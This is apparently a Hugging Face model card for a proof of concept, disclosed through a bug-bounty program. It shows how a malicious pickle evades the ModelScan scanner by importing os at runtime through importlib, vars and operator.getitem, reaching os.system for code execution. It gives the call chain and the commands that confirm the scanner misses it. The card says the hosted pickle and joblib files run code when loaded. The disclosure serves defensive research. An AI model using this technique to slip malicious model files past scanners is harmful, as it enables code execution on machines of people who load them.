Hugging Face's logo

xiaoyaoes
/
modelscan-importlib-bypass-poc

Joblib
generic
modelscan
picklescan
bypass
rce
importlib
import_module
proof-of-concept
Model card Files
xet
 Community

ModelScan Bypass PoC: importlib.import_module() + builtins.vars() + operator.getitem()

Overview

A systemic bypass of ModelScan's wildcard block mechanism.
Since importlib is not in any blocklist level (CRITICAL/HIGH/MEDIUM/LOW), it can import any blocked module at runtime, completely bypassing GLOBAL opcode checks.

The Bypass 

os_module = importlib.import_module("os")      # import os at RUNTIME (GLOBAL bypassed)
os_dict = vars(os_module)                      # vars = builtins.vars (NOT blocked)
os_system = operator.getitem(os_dict, "system") # operator.getitem (NOT blocked)
os_system("cmd")                                # RCE

Files

File Size Description
code_bypass.pkl 129 B Raw pickle (v5), 129 bytes
code_bypass.joblib 79 B joblib format, 79 bytes

Why This Matters

This bypass is architecturally different from dict-based bypasses:

  • It can import any blocked module: os, subprocess, socket, asyncio, shutil, etc.
  • The "os" string is data, not a GLOBAL reference — scanner can't see it
  • No wildcard (.*) can protect against this

Verification 

pip install modelscan
modelscan --path code_bypass.pkl   # "No issues found"
python -c "import pickle; pickle.load(open('code_bypass.pkl','rb'))"  # RCE

Disclosure

  • Researcher: xiaoyaoes
  • Date: 2026-06-19
  • Status: Reported via Huntr MFV program
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support